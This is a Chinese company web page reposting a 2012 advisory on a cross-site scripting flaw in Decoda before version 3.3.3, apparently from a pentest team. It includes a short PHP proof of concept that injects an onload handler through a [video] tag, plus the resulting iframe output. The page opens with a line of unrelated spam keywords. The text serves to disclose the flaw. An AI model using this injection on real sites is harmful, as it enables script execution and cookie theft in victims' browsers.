久艹视频免费看,亚洲成av人综合在线观看,51久久夜色精品国产水果派解说,gogo全球大胆高清人体444

知識學堂
  • ·聯(lián)系電話:+86.023-75585550
  • ·聯(lián)系傳真:+86.023-75585550
  • ·24小時手機:13896886023
  • ·QQ 咨 詢:361652718 513960520
當前位置 > 首頁 > 知識學堂 > 常見技術問題
Decoda跨站腳本漏洞
更新時間:2012-05-15 | 發(fā)布人:本站 | 點擊率:405

 Decoda 3.3.3之前版本中存在跨站腳本漏洞,該漏洞源于對用戶提供的輸入未經正確過濾。

 
攻擊者可利用該漏洞在受影響站點上下文的不知情用戶瀏覽器上執(zhí)行任意腳本代碼,盜取基于cookie的認證證書進而發(fā)起其他攻擊。
 
目前廠商還沒有提供此漏洞的相關補丁或者升級程序,建議使用此軟件的用戶隨時關注廠商的主頁以獲取最新版本
 
可用以下的概念證明型攻擊:
 
<?php
include '../decoda/Decoda.php';
$code = new Decoda();
$code->addFilter(new VideoFilter()); ?>
<?php
 
$decoda_markup = '[video="youtube" size="small"]"';
$decoda_markup .= 'onload="alert(\'RedTeam Pentesting XSS\');" id="[/video]';
 
$code->reset($decoda_markup);
echo $code->parse();
?>
 
This results in the following output (whitespace adjusted):
 
<iframe src="http:// www.xxxx.com /embed/"; onload="alert('RedTeam
Pentesting XSS');" id="" width="560" height="315"
frameborder="0"></iframe>
 
 
摘自 90' s Blog